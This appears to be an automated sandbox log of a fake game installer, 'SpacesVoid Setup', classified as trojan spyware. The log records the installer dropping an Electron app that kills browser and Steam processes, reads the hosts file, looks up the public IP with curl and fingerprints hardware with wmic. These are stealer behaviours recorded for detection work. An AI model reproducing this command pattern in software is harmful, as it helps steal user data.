Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVE

memstr_81226d25-0

Source: conhost.exe	Process created: 40
Source: cmd.exe	Process created: 76

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File dump: SpacesVoid.exe.0.dr 172675584			Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File dump: SpacesVoid.exe0.0.dr 172675584			Jump to dropped file

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Process token adjusted: Security

Jump to behavior

Source: libEGL.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: SpacesVoid.exe.0.dr	Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.0.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: SpacesVoid.exe0.0.dr	Static PE information: Number of sections : 15 > 10
Source: libEGL.dll0.0.dr	Static PE information: Number of sections : 11 > 10

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2449846367.00000000051D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2436234480.00000000051DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2508988317.00000000051D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2441953661.00000000051DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2395756562.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2395756562.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs SpacesVoid Setup 1.0.0.exe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2269514887.0000000005D56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs SpacesVoid Setup 1.0.0.exe

Source: SpacesVoid Setup 1.0.0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: // did the user specify their own .sln file?
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: * On Windows, find the first build/*.sln file.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: glob('build/*.sln', function (err, files) {
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: return path.extname(arg) === '.sln'
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: return callback(new Error('Could not find *.sln file. Did you run "configure"?'))

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@218/153@6/6

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Mutant created: \Sessions\1\BaseNamedObjects\e1611148-5250-504b-8870-9793aa65c9f1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

File created: C:\Users\user\AppData\Local\Temp\nsy6512.tmp

Jump to behavior

Source: SpacesVoid Setup 1.0.0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPACESVOID.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Steam.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "javaw.exe")
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

File read: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe "C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe"
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv \| "C:\Windows\system32\find.exe" "SpacesVoid.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "SpacesVoid.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2416 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list \| find /i "Speed""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
